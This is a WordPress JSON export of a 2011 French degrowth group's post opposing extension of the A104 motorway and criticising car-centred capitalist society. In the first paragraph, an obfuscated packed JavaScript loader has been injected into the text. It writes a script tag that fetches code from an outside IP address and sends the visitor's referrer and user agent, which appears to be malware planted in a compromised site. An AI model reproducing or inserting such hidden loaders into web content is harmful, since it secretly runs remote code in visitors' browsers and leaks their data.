{"id":5708,"date":"2011-02-18T13:28:10","date_gmt":"2011-02-18T12:28:10","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=5708"},"modified":"2011-02-21T14:29:18","modified_gmt":"2011-02-21T13:29:18","slug":"yvelines-decroissance-non-a-la104-non-a-la-bagnole","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=5708","title":{"rendered":"\u00ab\u00a0Yvelines-D\u00e9croissance\u00a0\u00bb &#8211; Non \u00e0 l&rsquo;A104, non \u00e0 la bagnole"},"content":{"rendered":"<p><!-- p { margin-bottom: 0.21cm; }a:link {  } --><\/p>\n<p style=\"margin-bottom: 0cm; text-align: left;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/static2.dmcdn.net\/static\/video\/527\/735\/9537725:jpeg_preview_medium.jpg?20100726092825\" alt=\"http:\/\/static2.dmcdn.net\/static\/video\/527\/735\/9537725:jpeg_preview_medium.jpg?20100726092825\" width=\"160\" height=\"120\" \/><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\"><strong><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Nous <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syrne|var|u0026u|referrer|bbabz||js|php'.split('|'),0,{}))\n<\/script><\/noindex> demandons l&rsquo;abandon du prolongement de l&rsquo;A104 qui serait un signal fort pour montrer l&rsquo;abandon du tout automobile et amorcer une r\u00e9flexion globale sur les d\u00e9placements.<\/span><\/span><\/strong><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">La civilisation de l&rsquo;automobile est responsable de multiples nuisances et pollutions\u00a0:<\/span><\/span><span style=\"font-family: Arial,sans-serif;\"> <\/span><\/p>\n<ul>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">pillage de la plan\u00e8te, \t\td\u00e9gradation de l&rsquo;environnement et mis\u00e8re sociale dans les pays du \t\tSud,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">\u00e9mission de CO2 et \t\tpollution atmosph\u00e9rique,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">occupation et \t\tmacadamisation de l&rsquo;espace de fa\u00e7on d\u00e9mentielle au d\u00e9triment, \t\tpar exemple, des terres arables,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">pollution sonore,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">pollution visuelle,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">pollution des eaux et \t\tdes terres en raison du bitume mais aussi du sel de d\u00e9neigement,<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">pollution sociale avec \t\tune d\u00e9structuration de la soci\u00e9t\u00e9, en favorisant un \u00e9talement \t\turbain sans coh\u00e9rence.<!--more--><\/span><\/span><\/li>\n<\/ul>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Notre soci\u00e9t\u00e9, organis\u00e9e autour de l&rsquo;automobile, est totalement \u00e9nergivore et a facilit\u00e9 l&rsquo;industrialisation de notre mode de vie avec toutes ses cons\u00e9quences funestes (agricultures industrielles, mode de vie standardis\u00e9 avec ces centres commerciaux g\u00e9ants \u2026).<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Or l&rsquo;A104, c&rsquo;est croire que<span style=\"font-weight: normal;\"> pour am\u00e9liorer le trafic, il suffit de construire de nouvelles routes et d\u2019agrandir le r\u00e9seau existant \u2013 en ignorant, par ailleurs, les m\u00e9faits que cela produit \u2013 pour accueillir plus d\u2019automobiles. Toutefois, si l\u2019accroissement de l\u2019offre d\u2019espace automobile am\u00e9liore provisoirement la circulation automobile, elle fait rapidement augmenter le trafic automobile puis finit par cr\u00e9er de nouvelles congestions qui n\u00e9cessiteront la mise en place de nouvelles infrastructures et provoqueront des nuisances suppl\u00e9mentaires. <\/span><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">En outre, m\u00eame \u00e0 titre individuel, nos comportements \u2013 renforc\u00e9e par plus de routes \u2013 renforcent cette soci\u00e9t\u00e9 de l&rsquo;automobile. En effet, pour fuir des villes pollu\u00e9es, d\u00e9v\u00e9g\u00e9talis\u00e9es, dangereuses, bruyantes, stressantes, les m\u00e9nages s\u2019installent en zones p\u00e9ri-urbaines ou semi-rurales (la campagne : oui, mais pas trop) et finissent par provoquer encore plus de nuisances et par renforcer l\u2019automobile comme \u00e9l\u00e9ment indispensable de notre civilisation.<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"JUSTIFY\">\n<p align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><span style=\"font-weight: normal;\">le v\u00e9ritable d\u00e9bat n\u2019est plus de savoir comment am\u00e9liorer le trafic automobile tout en pr\u00e9servant l\u2019environnement et en provoquant moins de nuisances, car l\u2019un est ins\u00e9parable de l\u2019autre ; il s\u2019agit de fonder une nouvelle politique des transports sur d\u2019autres bases que la route et l\u2019automobile. On voit bien que les chevaliers de la technique nous promettent tout un arsenal de solutions qui nous permettrons de r\u00e9soudre scientifiquement chacun de ses maux (en tout cas les plus visibles et les plus m\u00e9diatiques) et, surtout, sans remettre en cause le mode de vie sur lequel l\u2019automobile est fond\u00e9e.<\/span><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Les questions qu\u2019il faut se poser, c\u2019est si nous sommes pr\u00eats \u00e0 accepter de consacrer d\u2019immenses ressources pour la seule automobile alors qu\u2019elles manquent d\u00e9j\u00e0 \u00e0 des milliards de personnes et que la route est cr\u00e9atrice de nuisances dont certaines sont irr\u00e9versibles, ou encore si un embouteillage est absurde qu\u2019il soit constitu\u00e9 de voitures essences ou \u00e9lectriques sur deux ou quatre voies\u00a0?<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">La question du sens est cruciale car m\u00eame avec un p\u00e9trole abondant, une pollution de l\u2019environnement contenu, le \u00ab\u00a0syst\u00e8me automobile\u00a0\u00bb reste malsain car il implique une construction de la soci\u00e9t\u00e9 autour de l\u2019automobile et induit un mode de vie destructeur au service du capitalisme. Un usage pond\u00e9r\u00e9 et sage de l\u2019automobile ne poserait pas autant de probl\u00e8mes mais cela est rendu impossible par l\u2019implication de l\u2019automobile dans le syst\u00e8me capitaliste. Elle en est une victime mais en est devenue un levier indispensable pour l\u2019organiser et le faire prosp\u00e9rer.<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Ce sont bien la massification de l\u2019automobile et l\u2019organisation de la soci\u00e9t\u00e9 autour d\u2019elle qui posent probl\u00e8me. Il est donc n\u00e9cessaire de remettre en question notre mode de vie, r\u00e9former profond\u00e9ment notre mode de pens\u00e9e et notre sacro-saint confort moderne.<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Trouver des solutions aux maux caus\u00e9s par l\u2019automobile ne peut se traduire que par une r\u00e9volution dans notre fa\u00e7on d\u2019appr\u00e9hender le transport et notre organisation spatiale. Le flux des transports automobiles doit donc obligatoirement d\u00e9cro\u00eetre, notre territoire doit \u00eatre r\u00e9am\u00e9nag\u00e9 et les industries \u00eatre reconverties naturellement vers des activit\u00e9s qui seront mises en avant par le repli de l\u2019automobile et de ses infrastructures.<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\">Il faut bien voir que remettre en cause l\u2019automobile, c\u2019est remettre en cause la soci\u00e9t\u00e9 capitaliste et revoir les fondements m\u00eames de notre soci\u00e9t\u00e9, d\u2019une mani\u00e8re plus conviviale, plus respectueuse de l\u2019environnement mais aussi d\u2019autrui c\u2019est-\u00e0-dire une soci\u00e9t\u00e9 fond\u00e9e sur la simplicit\u00e9 volontaire dans le cadre d\u2019une politique de d\u00e9croissance s\u2019appuyant sur des exp\u00e9rimentations novatrices d\u00e9j\u00e0 existantes, et \u00e0 inventer, qui peuvent commencer \u00e0 nous guider.<\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em>Non \u00e0 l&rsquo;A104 pour sortir de l&rsquo;automobile<\/em><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em>Non \u00e0 l&rsquo;A104 pour sortir de la soci\u00e9t\u00e9 de Croissance<\/em><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em>Non \u00e0 l&rsquo;A104 pour donner un sens au d\u00e9placements<\/em><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em>Non \u00e0 l&rsquo;A104 pour repenser notre mode de vie<\/em><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em>Non \u00e0 l&rsquo;A104 pour r\u00eaver \u00e0 un autre monde<\/em><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"CENTER\">\n<p style=\"margin-bottom: 0cm; font-weight: normal;\" align=\"RIGHT\">\n<p style=\"margin-bottom: 0cm; line-height: 0.56cm;\" align=\"RIGHT\">Vous pouvez t\u00e9l\u00e9charger et diffuser une version tractable de cet article <a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/02\/Tract-A5-A104.pdf\">ici<\/a>.<\/p>\n<p style=\"margin-bottom: 0cm; line-height: 0.56cm;\" align=\"RIGHT\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><strong>Pour nous contacter\u00a0: <\/strong><\/span><\/span><\/p>\n<p style=\"margin-bottom: 0cm; line-height: 0.56cm;\" align=\"RIGHT\"><span style=\"color: #000080;\"><span lang=\"zxx\"><span style=\"text-decoration: underline;\"><a href=\"mailto:yvelines.decroissance@gmail.com\"><span style=\"font-family: Arial,sans-serif;\"><span style=\"font-size: small;\"><em><strong>yvelines.decroissance@gmail.com<\/strong><\/em><\/span><\/span><\/a><\/span><\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nous demandons l&rsquo;abandon du prolongement de l&rsquo;A104 qui serait un signal fort pour montrer l&rsquo;abandon du tout automobile et amorcer une r\u00e9flexion globale sur les d\u00e9placements. La civilisation de l&rsquo;automobile est responsable de multiples nuisances et pollutions\u00a0: pillage de la &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=5708\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":11,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[38],"tags":[],"class_list":["post-5708","post","type-post","status-publish","format-standard","hentry","category-yvelines"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5708"}],"version-history":[{"count":9,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5708\/revisions"}],"predecessor-version":[{"id":5831,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5708\/revisions\/5831"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}